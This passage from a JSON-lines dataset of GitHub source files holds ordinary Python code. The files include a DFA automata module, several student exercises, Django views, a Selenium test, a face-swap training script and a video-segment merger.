grouped_transitions.items():\n # print((state_from,state_to,letter))\n output_file.write('\\tq{} -> q{} [label=\"{}\"];\\n'.format(\n self.states.index(state_from),\n self.states.index(state_to),\n group_separator.join(\n \"{}\".format(letter if keep_alphabet else self.alphabet.index(letter))\n for letter in sorted(letters, key=lambda l: self.alphabet.index(l))\n ),\n ))\n\n # end\n output_file.write('}\\n')\n\n def graphviz(self, filename=None, *args, **kwargs):\n \"\"\"\n Useful in jupyter notebooks!\n See also self.export_dot(*args, **kwargs).\n \"\"\"\n import io\n import graphviz\n source = io.StringIO()\n self.export_dot(source, *args, **kwargs)\n gv = graphviz.Source(source.getvalue(), filename=filename)\n if filename: gv.save()\n return gv\n\n # Jupyter integration\n def _repr_mimebundle_(self, *args, **kwargs):\n \"\"\"Return the rendered graph as IPython mimebundle.\"\"\"\n gv = self.graphviz(\n keep_alphabet=True,\n group_separator=\";\",\n )\n try: func = gv._repr_mimebundle_\n except AttributeError as err: raise NotImplementedError() from err\n return func(*args, **kwargs)\n def _repr_svg_(self, *args, **kwargs):\n \"\"\"Return the rendered graph as SVG string.\"\"\"\n gv = self.graphviz(\n keep_alphabet=True,\n group_separator=\";\",\n )\n try: func = gv._repr_svg_\n except AttributeError as err: raise NotImplementedError() from err\n return func(*args, **kwargs)\n\n def size(self):\n return len(self.states)\n\n def _states(self):\n return set(self.states)\n\n def _initial_states(self):\n return set(self.init_states)\n\n def _terminal_states(self):\n return set(self.accepting_states)\n\n def _next_states(self, states, letter):\n # return set(self.transitions[(state,letter)] for state in states)\n return set(self.transitions[state][letter] for state in states)\n\n def test_word(self, word):\n current_states = self._initial_states()\n for letter in word:\n current_states = self._next_states(current_states,letter)\n return len(current_states & self._terminal_states()) != 0\n\n # def __str__(self):\n # writer = io.StringIO()\n # self.export_as_RPNI_automaton(writer)\n # return writer.getvalue()\n def __contains__(self, word):\n return self.test_word(word)\n \n @classmethod\n def from_aalpy(cls, dfa):\n import aalpy.automata\n assert isinstance(dfa, aalpy.automata.Dfa)\n\n init_state = dfa.states.index(dfa.initial_state)\n final_states = [\n dfa.states.index(state)\n for state in dfa.states\n if state.is_accepting\n ]\n transitions = {\n dfa.states.index(s1): {\n l: dfa.states.index(s2)\n for l,s2 in s1.transitions.items()\n }\n for s1 in dfa.states\n }\n \n result = cls(init_state, final_states, transitions)\n return result\n \n def to_aalpy(self):\n import aalpy.automata\n # states = []\n s2state = {}\n for s in self.states:\n state = aalpy.automata.DfaState(s, s in self.final_states)\n # states.append(state)\n s2state[s] = state\n for s,state in s2state.items():\n state.transitions = {\n l: s2state[s2]\n for l,s2 in self.transitions[s].items()\n }\n dfa = aalpy.automata.Dfa(\n initial_state=s2state[self.init_state],\n states=list(s2state.values()),\n )\n return dfa\n\n\n\ndef atom2letters(atom_string, letter2pos, is_word):\n # preprocessing of atom strings\n atom_string = atom_string.replace(' ' ,'')\n\n alphabet = list(letter2pos.keys())\n\n atomlist = atom_string.split('|')\n all_letter_list= set()\n for atom_disjuncts in atomlist:\n sign = {letter:0 for letter in alphabet}\n if atom_string != 'true':\n atoms = atom_disjuncts.split('&')\n for prop in atoms:\n if prop[0]=='~':\n sign[prop[1]] = -1\n else:\n sign[prop[0]] = 1\n letter_list = [[]]\n for letter in alphabet:\n new_letter_list = []\n if sign[letter] == 0:\n for l in letter_list:\n new_letter_list.append(l+[0])\n new_letter_list.append(l+[1])\n \n if sign[letter] == 1:\n for l in letter_list:\n new_letter_list.append(l+[1])\n\n if sign[letter] == -1:\n for l in letter_list:\n new_letter_list.append(l+[0])\n letter_list = new_letter_list\n\n letter_list = set([tuple(l) for l in letter_list])\n all_letter_list= all_letter_list.union(letter_list)\n \n return list(all_letter_list)\n\n\ndef atom2letters_new(atom_string, letter2pos, is_word):\n from ltlf2dfa.parser.ltlf import LTLfParser\n \n alphabet = list(letter2pos.keys())\n \n all_letters = set([tuple()])\n for atom in alphabet:\n new_all_letters = {letter+(0,) for letter in all_letters}\t\t\t\n new_all_letters = new_all_letters.union({letter+(1,) for letter in all_letters})\n all_letters = new_all_letters\n\n if is_word:\n all_letters = {i for i in all_letters if sum(i)==1}\n\n if atom_string == 'true':\n \n return all_letters\n\n if atom_string == 'false':\n\n no_letters = []\n return no_letters\n\n parser = LTLfParser()\n atom_formula = parser(atom_string)\n t = (atomformula2letters(atom_formula, letter2pos, all_letters, is_word))\n return t\n\n\ndef atomformula2letters(atom_formula, letter2pos, all_letters, is_word):\n\n try:\n op = atom_formula.operator_symbol\n if op == '&':\n letter_set = all_letters\n for child_atom in atom_formula.formulas:\n l = atomformula2letters(child_atom, letter2pos, all_letters, is_word)\n letter_set = letter_set.intersection(l)\n \n\n elif op == '|':\n letter_set = set()\n for child_atom in atom_formula.formulas:\n l = atomformula2letters(child_atom, letter2pos, all_letters, is_word)\n letter_set = letter_set.union(l)\n\n \n elif op == '!':\n child_atom = atom_formula.f\n l = atomformula2letters(child_atom, letter2pos, all_letters, is_word)\n letter_set = all_letters.difference(l)\n \n\n except:\n alphabet = list(letter2pos.keys())\n atom_list = atom_formula.find_labels()\n assert(len(atom_list)==1)\n letter_set = set([tuple()])\n for atom in alphabet:\n new_letter_set = set()\n if atom in atom_list:\n new_letter_set = new_letter_set.union({letter+(1,) for letter in letter_set})\n else:\n new_letter_set = new_letter_set.union({letter+(0,) for letter in letter_set})\t\t\t\n new_letter_set = new_letter_set.union({letter+(1,) for letter in letter_set})\n letter_set = new_letter_set\n if is_word:\n letter_set = {i for i in letter_set if sum(i)==1}\n return letter_set\n\n\n\ndef ltl2dfa(formula, letter2pos, is_word):\n \"\"\"convert formula into formulastring\n possiblilties to use the infix or the prefix form\"\"\"\n from ltlf2dfa.parser.ltlf import LTLfParser\n\n formula_str = formula.prettyPrint()\n\n parser = LTLfParser()\n \n formula = parser(formula_str) # returns an LTLfFormula\n\n #d = atom2letters(alphabet = alphabet)\n original_dfa = formula.to_dfa() #using atoms\n return dot2DFA(original_dfa, letter2pos=letter2pos, is_word=is_word)\n \n # create a map from propostitions to the corresponding digits\n\n\n\ndef dot2DFA(dot_string, *, letter2pos=None, is_word, group_separator=None):\n\n if isinstance(dot_string,io.TextIOBase):\n dot_string = dot_string.read()\n\n dfa_info = dot_string.split('\\n')\n mode = ''\n transitions = {}\n for line in dfa_info:\n \n if line == '}':\n break\n\n if 'doublecircle' in line:\n line = line.split(']')[1]\n line = line.replace(' ', '')\n final_states = line.split(';')[1:-1]\n\n if '->' in line and mode != 'transitions':\n line = line.replace(' ', '')\n init_state = line.split('->')[1][:-1]\n mode = 'transitions'\n continue\n \n if mode == 'transitions':\n edge, label_info = line.split('[')\n\n edge = edge.replace(' ', '')\n first_state, second_state = edge.split('->')\n\n label = label_info.split('\\\"')[1]\n if letter2pos is not None:\n letters = atom2letters_new(label, letter2pos, is_word)\n elif group_separator is not None:\n letters = label.split(group_separator)\n else:\n letters = [label]\n if first_state == '3':\n #print(label, letters)\n pass\n for letter in letters:\n try:\n transitions[first_state][letter] = second_state\n except:\n transitions[first_state] = {letter:second_state}\n\n\n formula_dfa = DFA(\n init_state=init_state,\n final_states=final_states,\n transitions=transitions,\n )\n\n return formula_dfa\n\n#letter2pos = {'p':0, 'q':1, 'r':2, 's':3}\n#print(atom2letters_new('~p & ~r', letter2pos))\n\n# dfa = (ltl2dfa('dummy', letter2pos))\n# dfa_c = dfa.complement()\n# print(dfa_c)\n# dfa_c.show()\n# print(dfa_c.generate_random_word_length(10))\n#print(str(dfa))\n\n# ltl = \"|(X(X(q)),&(F(p),X(q)))\"\n# f = Formula().convertTextToFormula(ltl)\n# letter2pos = {'p':0, 'q':1}\n# dfa = ltl2dfa(f, letter2pos)\n# dfa1 = dfa.complement()\n\n# # print(\"Started\")\n# l= dfa1.generate_random_words_in_batch((10,15), 100000)\n# # print(\"Ended\")\n# for word in l:\n# \tif dfa.is_word_in(word):\n# \t\tprint(word)\n\n#dfa = DFA(1, [2], {1:{'a':2, 'b':2, 'c':1}, 2:{'a':1, 'b':3, 'c':3}, 3:{'a':3, 'b':3, 'c':3}})\n#dfa.show()\n\n\ndef iter_prod(*dfas:Iterable[DFA],\n initial_states:Iterable[Tuple[State]]=None,\n labels:Iterable[Tuple[bool]]=None, # filter on these labels\n):\n \"iterate over all reachable states of the product automata, returning the shortest word to reach each such state.\"\n \n if initial_states is None:\n initial_states = itertools.product(*(dfa._initial_states() for dfa in dfas))\n elif isinstance(initial_states, tuple):\n initial_states = [initial_states]\n \n if labels is not None:\n if isinstance(labels, (tuple,bool)): labels = [labels]\n else: labels = list(labels)\n for i,label in enumerate(labels):\n if not isinstance(label, tuple): labels[i] = tuple(label for dfa in dfas)\n \n alphabet = dfas[0].alphabet\n visited = set(states for states in initial_states)\n word = ()\n queue = [(states,word) for states in visited]\n while queue:\n states, word = queue.pop(0)\n for letter in alphabet:\n word2 = word + (letter,)\n for states2 in itertools.product(*(dfa._next_states([state],letter) for dfa,state in zip(dfas,states))):\n if states2 in visited: continue\n visited.add(states2)\n queue.append((states2,word2))\n \n if labels is not None:\n label = tuple((state in dfa._terminal_states()) for dfa, state in zip(dfas, states))\n if label not in labels: continue\n\n yield states, word\n\ndef word_with_labels(dfas:Iterable[DFA], labels):\n \"\"\"return a word in the product dfa which has the desired labels.\"\"\"\n try: ans = next(iter_prod(*dfas, labels=labels))\n except StopIteration: return None\n states, word = ans\n return word","repo_name":"cryhot/samp2symb","sub_path":"samp2symb/base/dfa.py","file_name":"dfa.py","file_ext":"py","file_size_in_byte":34325,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"19"} +{"seq_id":"41759380219","text":"# A Floater is Prey; it updates by moving mostly in\r\n# a straight line, but with random changes to its\r\n# angle and speed, and displays as ufo.gif (whose\r\n# dimensions (width and height) are computed by\r\n# calling .width()/.height() on the PhotoImage\r\n\r\n\r\n#from PIL.ImageTk import PhotoImage\r\nfrom prey import Prey\r\nfrom random import random\r\n\r\n\r\nclass Floater(Prey): \r\n def __init__(self,x,y):\r\n Prey.__init__(self,x,y,10,10,0,5)\r\n Prey.randomize_angle(self)\r\n self.radius = 5\r\n \r\n \r\n def update(self, model):\r\n if random() > 0.3:\r\n self.move()\r\n else:\r\n fl_spd = 0\r\n while fl_spd < 3 or fl_spd > 7:\r\n fl_spd = self.get_speed()+(random()-0.5)\r\n self.set_speed(fl_spd)\r\n self.set_angle(self.get_angle()+(random()-0.5))\r\n self.move()\r\n \r\n \r\n def display(self, canvas):\r\n canvas.create_oval(self.get_location()[0]-self.radius, self.get_location()[1]-self.radius, self.get_location()[0]+self.radius, self.get_location()[1]+self.radius, fill='red')\r\n","repo_name":"nickhuynh83/ICS33-Projects","sub_path":"program5/program5/floater.py","file_name":"floater.py","file_ext":"py","file_size_in_byte":1122,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"19"} +{"seq_id":"15549257620","text":"\"\"\"\n7. Faça um programa que leia a idade de várias pessoas visitantes de um show (a\nleitura da idade 0 indicará o fim dos dados de entrada), calcule e exiba:\n• A média de idade do público;\n• A porcentagem de pessoas com idade entre 18 e 21 anos;\n• Idade do visitante mais jovem.\n\"\"\"\n\ntexto_idade = 'Digite a sua idade: '\nidade = int(input(texto_idade))\nsoma_idade = 0\nflag = 0\n# Porcentagem de pessoas com idade entre 18 e 21 anos\nporcentagem = float()\nquantidade_idade = 0\nquantidade_porcentagem = 0\nmenor_idade = 0\n\nwhile idade != flag:\n quantidade_idade += 1\n soma_idade += idade\n media = soma_idade / quantidade_idade\n if (idade >= 18) and (idade <= 21):\n quantidade_porcentagem += 1\n porcentagem = quantidade_porcentagem / idade\n if idade < menor_idade:\n menor_idade = idade\n print('Digite \"0\" caso queira parar o programa.')\n if idade != flag:\n idade = int(input(texto_idade))\n\nprint()\nprint(f'Média de idade do público: {media}.')\nprint(f'Porcentagem de pessoas com idade entre 18 e 21 anos: {porcentagem}.')\nprint(f'Idade do visitante mais jovem do show: {menor_idade}')\nprint('Fim do programa')\n","repo_name":"yagocdj/IFPB-2022.1-APE","sub_path":"Lista04/Lista04q07.py","file_name":"Lista04q07.py","file_ext":"py","file_size_in_byte":1166,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"19"} +{"seq_id":"14304936077","text":"from selenium import webdriver\nimport pytest\n\nclass TestAssert():\n def setup(self):\n self.driver = webdriver.Chrome()\n self.driver.get('https://ceshiren.com/')\n self.driver.maximize_window()\n # 隐式等待,每一次调用find_element方法时激活该方法,每隔0.5s寻找一次元素\n self.driver.implicitly_wait(5)\n\n def test_assert(self):\n element = self.driver.find_element_by_link_text('所有分类')\n element.click()\n # # 点击后,class变为active,重新获取元素\n element1 = self.driver.find_element_by_link_text('所有分类')\n result = element1.get_attribute('class')\n # 断言\n assert 'active' == result\n\n\n def teardown(self):\n self.driver.quit()\n\nif __name__ == '__main__':\n pytest.main()","repo_name":"yamaxin/hogwarts-lg4-yamaxin","sub_path":"WebDriver_test/test_assert.py","file_name":"test_assert.py","file_ext":"py","file_size_in_byte":818,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"19"} +{"seq_id":"3541065247","text":"#coding=utf-8\n\n'''\n题目描述\n输入一行字符,分别统计出包含英文字母、空格、数字和其它字符的个数。\n /**\n * 统计出英文字母字符的个数。\n *\n * @param str 需要输入的字符串\n * @return 英文字母的个数\n */\n public static int getEnglishCharCount(String str)\n {\n return 0;\n }\n\n /**\n * 统计出空格字符的个数。\n *\n * @param str 需要输入的字符串\n * @return 空格的个数\n */\n public static int getBlankCharCount(String str)\n {\n return 0;\n }\n\n /**\n * 统计出数字字符的个数。\n *\n * @param str 需要输入的字符串\n * @return 英文字母的个数\n */\n public static int getNumberCharCount(String str)\n {\n return 0;\n }\n\n /**\n * 统计出其它字符的个数。\n *\n * @param str 需要输入的字符串\n * @return 英文字母的个数\n */\n public static int getOtherCharCount(String str)\n {\n return 0;\n }\n\n'''\n\ndef statistic(str):\n Englishchar=0\n Blankchar=0\n Numberchar=0\n Otherchar=0\n for i in range(len(str)):\n if 'a'<=str[i]<='z' or 'A'<=str[i]<='Z':\n Englishchar+=1\n elif str[i]==' ':\n Blankchar+=1\n elif '0'<=str[i]<='9':\n Numberchar+=1\n else:\n Otherchar+=1\n\n return Englishchar,Blankchar,Numberchar,Otherchar\nwhile True:\n try:\n\n#str=r\"1qazxsw23 edcvfr45tgbn hy67uj m,ki89ol.\\\\/;p0-=\\\\][\"\n#str=repr(input())\n#str=str[1:-1]\n str=input()\n #print(str)\n\n Englishchar,Blankchar,Numberchar,Otherchar=statistic(str)\n print(Englishchar)\n print(Blankchar)\n print(Numberchar)\n print(Otherchar)\n except:\n break\n","repo_name":"1274085042/Algorithm","sub_path":"Offer/HUAWEI/输入一行字符,分别统计出包含英文字母、空格、数字和其它字符的个数.py","file_name":"输入一行字符,分别统计出包含英文字母、空格、数字和其它字符的个数.py","file_ext":"py","file_size_in_byte":1795,"program_lang":"python","lang":"zh","doc_type":"code","stars":1,"dataset":"github-code","pt":"19"} +{"seq_id":"74137846123","text":"# 2056. 연월일 달력\nm30 = [4, 6, 9, 11]\nm31 = [1, 3, 5, 7, 8, 10, 12]\n\n\ndef solve(arr):\n # 년의 값 y\n y = ''.join(arr[0:4])\n # 달의 값 m\n m = ''.join(arr[4:6])\n # 날의값 d\n d = ''.join(arr[6:8])\n if int(m) in m30 and 1 <= int(d) <= 30:\n return y + '/' + m + '/' + d\n elif int(m) in m31 and 1 <= int(d) <= 31:\n return y + '/' + m + '/' + d\n elif int(m) == 2 and 1 <= int(d) <= 28:\n return y + '/' + m + '/' + d\n else:\n return -1\n\n\nT = int(input())\nfor tc in range(1, T + 1):\n ymd = list(input())\n result = solve(ymd)\n print('#{} {}'.format(tc, result))\n","repo_name":"JIH319/cereal","sub_path":"suhyun/week05/2056_연월일 달력.py","file_name":"2056_연월일 달력.py","file_ext":"py","file_size_in_byte":633,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"19"} +{"seq_id":"437155044","text":"from django.shortcuts import render\nfrom django.http import JsonResponse\nfrom rest_framework import status\n\nfrom rest_framework.decorators import api_view, permission_classes\nfrom rest_framework.permissions import AllowAny\nfrom rest_framework.response import Response\nfrom django.core import serializers\nfrom django.forms.models import model_to_dict\nimport json\n\nfrom .models import Docente, Categoria, AnoLetivo, AreaCientifica,\\\n Cadeira, News, Recurso, Turma, Nota, Calendario\nfrom .serializers import NewsSerializer, RecursoSerializer, NotaSerializer, CalendarioSerializer\n\nfrom rest_framework.pagination import PageNumberPagination\nfrom lei.pagination import NewsPageNumberPagination, CalendarioPageNumberPagination, RecursoPageNumberPagination\n# Create your views here.\n\n\n@api_view(['GET'])\ndef index(request):\n api_urls = {\n # listar\n 'List News': '/news-list',\n 'List Recurso': '/recursos-list',\n 'List RecursoAll': '/allrecursos-list',\n 'List Notas': '/notas-list',\n 'List Lei': '/lei-list',\n 'List calendario': '/calendario-list',\n\n # recurso especifico\n\n 'Detail Recuso': '/recursos-detail//',\n\n }\n return Response(api_urls)\n\n\n@api_view(['GET'])\n@permission_classes([AllowAny, ])\ndef newsList(request):\n\n news = News.objects.all().order_by('-id')\n paginator = NewsPageNumberPagination()\n news_result = paginator.paginate_queryset(news, request)\n serializer = NewsSerializer(news_result, many=True)\n return paginator.get_paginated_response(serializer.data)\n\n\n@api_view(['GET'])\ndef recursoList(request):\n recursos = Recurso.objects.select_related('cadeira', 'docente', 'categoria', 'anoletivo').all().order_by('-id')\n paginator = RecursoPageNumberPagination()\n recurso_result = paginator.paginate_queryset(recursos, request)\n serializer = RecursoSerializer(recurso_result, many=True)\n return paginator.get_paginated_response(serializer.data)\n\n\n# retornar os recursos não paginados\n@api_view(['GET'])\ndef allrecursoList(request):\n recurso = Recurso.objects.select_related('cadeira', 'docente', 'categoria', 'anoletivo').all().order_by('-id')\n serializer = RecursoSerializer(recurso, many=True)\n return Response(serializer.data)\n\n\n@api_view(['GET'])\ndef recursoDetail(request, pk):\n recurso = Recurso.objects.get(id=pk)\n serializer = RecursoSerializer(recurso, many=False)\n # print('Recurso:: ',serializer.data)\n return Response(serializer.data)\n\n\n@api_view(['GET'])\ndef notaList(request):\n notas = Nota.objects.select_related('turma').all().order_by('-id')\n\n # dicionario para agrupar as notas por turma\n dicionario = {}\n print(notas)\n\n for nota in notas:\n # print(nota)\n # print(type(nota))\n if not nota.turma.turma in dicionario:\n dicionario[nota.turma.turma] = []\n #serializar as notas\n notaserialized = NotaSerializer(nota, many=False)\n dicionario[nota.turma.turma].append(notaserialized.data)\n # print(dicionario)\n\n serializer = NotaSerializer(notas, many=True)\n return Response(dicionario)\n\n\n@api_view(['GET'])\n@permission_classes([AllowAny, ])\ndef calendarioList(request):\n\n calendario = Calendario.objects.all().order_by('dataInicio')\n serializer = CalendarioSerializer(calendario, many=True)\n return Response(serializer.data)\n\n\n","repo_name":"deji12/testdeployment","sub_path":"lei/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":3367,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"19"} +{"seq_id":"26385696563","text":"from datetime import datetime\nfrom typing import Optional\n\nfrom pydantic import BaseModel\n\n\nclass BaseVehicle(BaseModel):\n plate: str\n brand: str\n model: str\n color: str\n vehicle_type: str\n state: str = \"received\"\n creation_employee_id: str\n update_employee_id: str\n\n\nclass CreateVehicle(BaseVehicle):\n pass\n\n\nclass UpdateVehicle(BaseModel):\n update_employee_id: Optional[str]\n brand: Optional[str]\n model: Optional[str]\n color: Optional[str]\n vehicle_type: Optional[str]\n state: Optional[str]\n\n\nclass VehicleInDB(BaseVehicle):\n created_at: datetime\n last_modified: datetime\n\n class Config:\n orm_mode = True\n","repo_name":"DanielSantaR/final-web","sub_path":"app/schemas/vehicle.py","file_name":"vehicle.py","file_ext":"py","file_size_in_byte":669,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"19"} +{"seq_id":"25178911547","text":"import concraft\nimport wdnet\n\ndef analyse(sentence, concraftClient):\n for word in concraftClient.lemmatize(sentence).split():\n print(word)\n hyponyms = wdnet.get_hyponyms(word, 2)\n for hyponym in set(hyponyms):\n print (\"\\t{0}\".format(hyponym))\n\nserver = concraft.Server()\nport = server.get_port()\nclient = concraft.Client(port)\n\nsentence = input(\"Please wait for the server to load and then enter a sentence\\n\")\nanalyse(sentence, client)\nwhile (True):\n sentence = input(\"Please enter another sentence or leave a blank line to exit:\\n\")\n if not sentence:\n break\n analyse(sentence, client)\n","repo_name":"sbdzdz/ivr-synsets","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":638,"program_lang":"python","lang":"en","doc_type":"code","stars":6,"dataset":"github-code","pt":"19"} +{"seq_id":"2099359749","text":"from network.AEI_Net import *\nfrom network.HEAR_Net import *\nfrom utils.Dataset import *\nfrom torch.utils.data import DataLoader\nimport torch.optim as optim\nfrom face_modules.model import Backbone, Arcface, MobileFaceNet, Am_softmax, l2_norm\nimport torch.nn.functional as F\nimport torch\nimport time\nimport numpy as np\nimport torchvision\nimport cv2\nfrom apex import amp\nimport visdom\n\n\nvis = visdom.Visdom(server='127.0.0.1', env='faceshifter', port=8099)\nbatch_size = 32\nlr = 4e-4\nmax_epoch = 2000\nshow_step = 10\nsave_epoch = 1\nmodel_save_path = './saved_models/'\noptim_level = 'O1'\n\ndevice = torch.device('cuda')\n\nG = AEI_Net(c_id=512).to(device)\nG.eval()\nG.load_state_dict(torch.load('./saved_models/G_latest.pth', map_location=torch.device('cpu')), strict=True)\n\nnet = HearNet()\nnet.train()\nnet.to(device)\n\narcface = Backbone(50, 0.6, 'ir_se').to(device)\narcface.eval()\narcface.load_state_dict(torch.load('./face_modules/model_ir_se50.pth', map_location=device), strict=False)\n\nopt = optim.Adam(net.parameters(), lr=lr, betas=(0, 0.999))\n\nnet, opt = amp.initialize(net, opt, opt_level=optim_level)\n\ntry:\n net.load_state_dict(torch.load('./saved_models/HEAR_latest.pth', map_location=torch.device('cpu')), strict=False)\nexcept Exception as e:\n print(e)\n\ndataset = AugmentedOcclusions('../hearnet_data',\n ['../ego_hands_png'],\n ['../shapenet_png'], same_prob=0.5)\ndataloader = DataLoader(dataset, batch_size=batch_size, shuffle=True, num_workers=0, drop_last=True)\n\nMSE = torch.nn.MSELoss()\nL1 = torch.nn.L1Loss()\n\n\ndef get_numpy_image(X):\n X = X[:8]\n X = torchvision.utils.make_grid(X.detach().cpu(), nrow=X.shape[0]).numpy() * 0.5 + 0.5\n X = X.transpose([1,2,0])*255\n np.clip(X, 0, 255).astype(np.uint8)\n return X\n\n\ndef make_image(Xs, Xt, Y):\n Xs = get_numpy_image(Xs)\n Xt = get_numpy_image(Xt)\n Y = get_numpy_image(Y)\n return np.concatenate((Xs, Xt, Y), axis=0).transpose([2, 0, 1])\n\nprint(torch.backends.cudnn.benchmark)\n#torch.backends.cudnn.benchmark = True\nfor epoch in range(0, max_epoch):\n # torch.cuda.empty_cache()\n for iteration, data in enumerate(dataloader):\n start_time = time.time()\n Xs, Xt, same_person = data\n Xs = Xs.to(device)\n Xt = Xt.to(device)\n with torch.no_grad():\n embed_s, _ = arcface(F.interpolate(Xs[:, :, 19:237, 19:237], [112, 112], mode='bilinear', align_corners=True))\n embed_t, _ = arcface(F.interpolate(Xt[:, :, 19:237, 19:237], [112, 112], mode='bilinear', align_corners=True))\n same_person = same_person.to(device)\n\n # train G\n opt.zero_grad()\n with torch.no_grad():\n Yst_hat, _ = G(Xt, embed_s)\n Ytt, _ = G(Xt, embed_t)\n\n dYt = Xt - Ytt\n hear_input = torch.cat((Yst_hat, dYt), dim=1)\n Yst = net(hear_input)\n\n Yst_aligned = Yst[:, :, 19:237, 19:237]\n\n id_Yst, _ = arcface(F.interpolate(Yst_aligned, [112, 112], mode='bilinear', align_corners=True))\n\n L_id =(1 - torch.cosine_similarity(embed_s, id_Yst, dim=1)).mean()\n\n L_chg = L1(Yst_hat, Yst)\n\n L_rec = torch.sum(0.5 * torch.mean(torch.pow(Yst - Xt, 2).reshape(batch_size, -1), dim=1) * same_person) / (same_person.sum() + 1e-6)\n\n loss = L_id + L_chg + L_rec\n with amp.scale_loss(loss, opt) as scaled_loss:\n scaled_loss.backward()\n\n # loss.backward()\n opt.step()\n\n batch_time = time.time() - start_time\n if iteration % show_step == 0:\n image = make_image(Xs, Xt, Yst)\n vis.image(image, opts={'title': 'HEAR'}, win='HEAR')\n cv2.imwrite('./gen_images/HEAR_latest.jpg', image.transpose([1,2,0])[:,:,::-1])\n print(f'epoch: {epoch} {iteration} / {len(dataloader)}')\n print(f'loss: {loss.item()} batch_time: {batch_time}s')\n print(f'L_id: {L_id.item()} L_chg: {L_chg.item()} L_rec: {L_rec.item()}')\n if iteration % 1000 == 0:\n torch.save(net.state_dict(), './saved_models/HEAR_latest.pth')\n\n\n","repo_name":"taotaonice/FaceShifter","sub_path":"train_HEAR.py","file_name":"train_HEAR.py","file_ext":"py","file_size_in_byte":4064,"program_lang":"python","lang":"en","doc_type":"code","stars":245,"dataset":"github-code","pt":"19"} +{"seq_id":"5225909015","text":"# Damon Incorvaia\n# CSC 351 Spring 2023\n\nclass PiggyBank:\n\n def __init__(self, amount):\n self.amount = amount\n\n def deposit(self, dep_amount):\n self.amount += dep_amount\n return self.amount\n\n def withdraw(self, with_amount):\n if with_amount > self.amount:\n real_amount = self.amount\n self.amount = 0\n return real_amount\n\n else:\n self.amount -= with_amount\n return with_amount\n\ndef main():\n pig = PiggyBank(25)\n print(f\"Piggy Bank Initialized with {pig.amount} dollars.\")\n\n escape = 0\n while escape != 3:\n print(\"=\"*15)\n print(\"Select an option:\")\n print(\"1. Deposit\\n2. Withdraw\\n3. Exit\")\n escape = input()\n escape = int(escape)\n\n if escape == 1:\n dep_input = input(\"Enter the amount to deposit: \")\n dep_input = int(dep_input)\n print(f\"You deposited {dep_input}. You now have {pig.deposit(dep_input)}.\")\n\n if escape == 2:\n with_input = input(\"Enter the amount to withdraw: \")\n with_input = int(with_input)\n print(f\"You attempted to withdraw {with_input}. You got {pig.withdraw(with_input)}.\")\n \nmain()","repo_name":"damoninc/CSC-351","sub_path":"piggybank.py","file_name":"piggybank.py","file_ext":"py","file_size_in_byte":1239,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"19"} +{"seq_id":"3633703464","text":"from typing import Sequence, Mapping\n\nfrom datetime import datetime\n\nfrom google.cloud import bigquery\n\n\ndef write_summarization_to_table(\n project_id: str,\n dataset_id: str,\n table_id: str,\n bucket: str,\n filename: str,\n complete_text: str,\n complete_text_uri: str,\n summary: str,\n summary_uri: str,\n timestamp: datetime,\n) -> Sequence[Mapping]:\n \"\"\"Updates the BigQuery table with the document summarization\n\n Original sample is here:\n https://cloud.google.com/bigquery/docs/samples/bigquery-table-insert-rows-explicit-none-insert-ids\n\n Args:\n project_id (str): the Google Cloud project ID\n dataset_id (str): the name of the BigQuery dataset\n table_id (str): the name of the BigQuery table\n bucket (str): the name of the bucket with the PDF\n filename (str): path of PDF relative to bucket root\n complete_text (str): the complete text of the PDF\n complete_text_uri (str): the Storage URI of the complete TXT document\n summary (str): the text summary of the document\n summary_uri (str): the Storage URI of the summary TXT document\n timestamp (datetime): when the processing occurred\n \"\"\"\n if (project_id == \"\") or (dataset_id == \"\") or (table_id == \"\"):\n return [ValueError(\"project_id, dataset_id, or table_id is missing\")]\n\n if (\n (bucket == \"\")\n and (filename == \"\")\n and (complete_text == \"\")\n and (summary_uri == \"\")\n and (summary == \"\")\n and (complete_text_uri == \"\")\n and (timestamp is None)\n ):\n return [ValueError(\"no row data provided for updating table\")]\n client = bigquery.Client()\n\n table_name = f\"{project_id}.{dataset_id}.{table_id}\"\n\n rows_to_insert = [\n {\n \"bucket\": bucket,\n \"filename\": filename,\n \"extracted_text\": complete_text,\n \"summary_uri\": summary_uri,\n \"summary\": summary,\n \"complete_text_uri\": complete_text_uri,\n \"timestamp\": timestamp.isoformat(),\n }\n ]\n\n errors = client.insert_rows_json(\n table_name, rows_to_insert, row_ids=bigquery.AutoRowIDs.GENERATE_UUID\n )\n\n return errors\n","repo_name":"GoogleCloudPlatform/terraform-genai-doc-summarization","sub_path":"webhook/bigquery.py","file_name":"bigquery.py","file_ext":"py","file_size_in_byte":2196,"program_lang":"python","lang":"en","doc_type":"code","stars":45,"dataset":"github-code","pt":"19"} +{"seq_id":"25760839082","text":"\"\"\"\r\n@author: JerryYang\r\n@file: movies_m3u8_ts_marge.py\r\n@time: 2023/6/8 21:06\r\n@desc: OK(合并后的文件在ts文件同目录,扩展名为mp4\r\n\"\"\"\r\nimport os\r\n\r\n\r\ndef get_sorted_filenames(folder_path):\r\n \"\"\"\r\n\r\n 获取指定文件夹下的所有文件名,并返回一个按数字大小排序的列表。\r\n\r\n \"\"\"\r\n\r\n filenames = []\r\n\r\n for filename in os.listdir(folder_path):\r\n\r\n if os.path.isfile(os.path.join(folder_path, filename)):\r\n num = int(filename.split('.')[0]) # 从文件名中提取数字部分\r\n\r\n filenames.append((num, filename)) # 将数字和文件名组成元组,添加到列表中\r\n\r\n filenames.sort() # 对列表进行排序\r\n\r\n return [f[1] for f in filenames]\r\n\r\n\r\n# def get_filenames(save_path):\r\n# \"\"\"\r\n#\r\n# 获取指定文件夹下的所有文件名,并返回一个列表。\r\n#\r\n# \"\"\"\r\n#\r\n# filenames = []\r\n#\r\n# for filename in os.listdir(save_path):\r\n#\r\n# if os.path.isfile(os.path.join(save_path, filename)):\r\n# filenames.append(filename)\r\n#\r\n# return filenames\r\n\r\n\r\ndef merge_ts_files(output_file, ts_files, save_path):\r\n 